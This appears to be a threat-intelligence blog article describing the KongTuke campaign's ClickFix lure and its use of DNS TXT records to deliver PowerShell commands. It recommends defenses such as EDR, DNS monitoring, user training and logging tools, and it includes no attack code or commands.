Unmasking ClickFix: A Deep Dive into KongTuke’s DNS TXT-Based PowerShell Execution

The cybersecurity landscape has darkened with the sophisticated evolution of the KongTuke campaign. Active since mid-2025, this threat actor group has continuously refined its techniques to bypass conventional enterprise security filters. Their primary weapon remains the “ClickFix” strategy, a social engineering vector that deceives unsuspecting users into manually fixing simulated website errors. This article delves into KongTuke’s innovative use of DNS TXT records to orchestrate PowerShell command execution, a technique designed for stealth and evasion.

KongTuke’s Evolving Threat Landscape

KongTuke, an advanced persistent threat (APT) group, has consistently demonstrated a high level of operational sophistication since mid-2025. Their tactics, techniques, and procedures (TTPs) are continually updated to evade detection, making them a formidable opponent for even well-resourced security teams. Unlike many opportunistic groups, KongTuke focuses on methodical infiltration and persistent access, often targeting organizations of strategic value.

The Deceptive Power of “ClickFix”

At the heart of the KongTuke campaign lies “ClickFix,” a cunning social engineering ploy. Users are presented with simulated website errors that appear legitimate, prompting them to download and run a script or executable under the guise of a “fix.” This initial interaction is crucial, as it grants the attackers the necessary foothold to initiate their multi-stage attack. The psychological manipulation involved in ClickFix capitalizes on users’ desire for immediate problem resolution, bypassing technical security controls through human interaction.

DNS TXT Records: An Unconventional Command and Control Channel

A key innovation in the latest KongTuke campaign is the leveraging of DNS TXT records for command and control (C2). Traditionally used for storing human-readable text information about a domain (like SPF records for email authentication), TXT records offer an obscure and often overlooked channel for data exfiltration and command issuance. This method allows attackers to embed malicious commands or links within these records, which are then queried and executed by the ClickFix script on the victim’s machine. The primary advantage here is the stealth – DNS traffic is typically considered benign and is rarely subjected to deep packet inspection for C2 indicators, making it an excellent bypass for traditional network-based security solutions.

PowerShell Execution: The Silent Workhorse

Once the ClickFix script runs and successfully extracts commands from the DNS TXT records, it orchestrates the execution of these commands via PowerShell. PowerShell, a powerful command-line shell and scripting language built into Windows, is frequently abused by attackers due to its inherent capabilities for system administration, data manipulation, and direct interaction with the operating system. KongTuke uses PowerShell to perform a range of post-exploitation activities, including:

• Establishing persistence
• Lateral movement within the network
• Data exfiltration
• Deploying additional malware payloads

The abuse of native operating system tools (Living Off The Land – LOTL) is a hallmark of sophisticated attackers, as it reduces the footprint of custom malware and blends malicious activity with legitimate system processes.

Remediation Actions and Proactive Defense

Defending against advanced threats like KongTuke requires a multi-layered approach that combines technical controls with robust security awareness training. Given the tactics employed, organizations should focus on the following remediation actions:

• Enhanced Endpoint Detection and Response (EDR): Deploy and meticulously configure EDR solutions to detect unusual PowerShell activity, especially execution chains originating from web browser downloads or temporary directories. Look for PowerShell scripts attempting to query DNS TXT records for non-standard domains.
• DNS Monitoring and Filtering: Implement advanced DNS monitoring to identify anomalous TXT record queries, particularly those from internal hosts to domains not typically associated with legitimate business operations. Consider DNS sinkholing for known malicious domains.
• User Awareness Training: Conduct regular and engaging security awareness training that specifically addresses social engineering tactics like ClickFix. Educate users on the dangers of downloading and executing unverified scripts, even if they appear to “fix” a technical issue. Emphasize reporting suspicious activity to the IT security team.
• Principle of Least Privilege: Enforce the principle of least privilege across all user accounts. Restrict PowerShell script execution to authorized users and implement PowerShell logging and constrained language mode where appropriate.
• Application Whitelisting: Implement application whitelisting to prevent unauthorized executables and scripts from running on endpoints.
• Network Segmentation: Segment your network to limit lateral movement in case of a successful compromise.

Tools for Detection and Mitigation

Effective defense against DNS TXT-based C2 and PowerShell abuse relies on a combination of robust security tools.

Tool Name	Purpose	Link
Sysmon	Advanced logging of system activity, including command-line processes (e.g., PowerShell) and network connections.	https://learn.microsoft.com/en-us/sysinternals/downloads/sysmon
PowerShell ScriptBlock Logging	Captures full content of PowerShell commands and script blocks for forensic analysis.	https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_logging?view=powershell-7.3
Splunk/ELK Stack	Security Information and Event Management (SIEM) for aggregating and analyzing logs from various sources, identifying anomalies.	https://www.splunk.com / https://www.elastic.co/elastic-stack/
Active Directory Domain Services (AD DS) Log Monitoring	Monitor for unusual DNS queries from domain controllers or client machines.	https://learn.microsoft.com/en-us/windows-server/identity/ad-ds/ad-ds-event-logging
Endpoint Detection and Response (EDR) Solutions	Behavioral analytics and threat hunting for malicious activities on endpoints. (e.g., CrowdStrike, SentinelOne, Microsoft Defender for Endpoint)	OEM Specific

Conclusion

The KongTuke campaign exemplifies the constant evolution of cyber threats. Their innovative use of DNS TXT records for command and control, coupled with the “ClickFix” social engineering vector and PowerShell execution, underscores the need for continuous vigilance. Organizations must prioritize robust security awareness, advanced endpoint protection, and comprehensive network and DNS monitoring to effectively counter these stealthy and persistent attacks. Maintaining a proactive security posture and staying informed about emerging TTPs are critical for safeguarding valuable assets.